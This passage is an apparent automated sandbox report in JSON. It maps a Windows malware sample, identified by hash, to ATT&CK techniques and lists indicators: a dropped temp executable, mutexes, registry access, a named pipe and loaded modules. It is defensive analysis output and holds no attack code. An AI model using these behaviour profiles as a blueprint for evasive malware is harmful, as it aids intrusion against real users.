"T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\chrmgspr.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74940000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74500000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"GDI32.DLL\" at base 75960000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75840000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d60000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"KERNEL32\" at base 76c60000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b2f0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"KERNEL32.DLL\" at base 76c60000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"WS2_32.DLL\" at base 77070000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"DBGHELP.DLL\" at base 6f710000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"USER32.DLL\" at base 76b90000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"ADVAPI32.DLL\" at base 759b0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"SHELL32.DLL\" at base 75c30000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"OLEAUT32.DLL\" at base 75b90000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"MSVCR100.DLL\" at base 69d60000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"NTDLL.DLL\" at base 76f20000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"OLE32.DLL\" at base 75160000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"CRYPTBASE.DLL\" at base 74d20000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73aa0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"PROPSYS.DLL\" at base 73be0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"COMCTL32.DLL\" at base 73d20000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"APPHELP.DLL\" at base 74cd0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"CLBCATQ.DLL\" at base 76d40000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 69f10000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76c60000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"SETUPAPI.DLL\" at base 768f0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"RPCRT4.DLL\" at base 76ae0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73be0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"NTMARTA.DLL\" at base 74290000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75810000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"PROFAPI.DLL\" at base 74e40000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74ee0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76dd0000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"SECUR32.DLL\" at base 74b50000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74e50000\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74cd0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d60000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 76c60000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 75960000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75840000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d60000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 76c60000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b2f0000\n \"chrmgspr.exe\" loaded module \"GDI32.DLL\" at base 75960000\n \"chrmgspr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75840000\n \"chrmgspr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d60000\n \"chrmgspr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"chrmgspr.exe\" loaded module \"KERNEL32\" at base 76c60000\n \"chrmgspr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"chrmgspr.exe\" loaded module \"KERNEL32.DLL\" at base 76c60000\n \"chrmgspr.exe\" loaded module \"WS2_32.DLL\" at base 77070000\n \"chrmgspr.exe\" loaded module \"DBGHELP.DLL\" at base 6f710000\n \"chrmgspr.exe\" loaded module \"USER32.DLL\" at base 76b90000\n \"chrmgspr.exe\" loaded module \"ADVAPI32.DLL\" at base 759b0000\n \"chrmgspr.exe\" loaded module \"SHELL32.DLL\" at base 75c30000\n \"chrmgspr.exe\" loaded module \"OLEAUT32.DLL\" at base 75b90000\n \"chrmgspr.exe\" loaded module \"MSVCR100.DLL\" at base 680b0000\n \"chrmgspr.exe\" loaded module \"SSPICLI.DLL\" at base 74cb0000\n \"chrmgspr.exe\" loaded module \"RPCRT4.DLL\" at base 76ae0000\n \"chrmgspr.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75810000\n \"chrmgspr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74cd0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 71c40000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6c5e0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 76c60000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c5c0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6ac80000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69dc0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76c60000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6bfa0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69ea0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6b890000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6b2e0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 69db0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69d90000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69ad0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 69510000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 76ae0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 68050000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 69d60000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 67fe0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 67bd0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 69b10000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 67b00000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75160000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 74d20000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73aa0000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74830000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 76b90000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76d40000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c1d0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 759b0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75810000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75810000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75810000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75810000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 745c0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74dc0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6f930000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 74e60000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74400000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74500000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 75b90000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73190000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73090000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73430000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 72eb0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75810000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72e70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 747f0000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 746b0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72e60000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 77070000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76ae0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73100000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 706d0000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74cb0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75810000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74350000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005760)\n 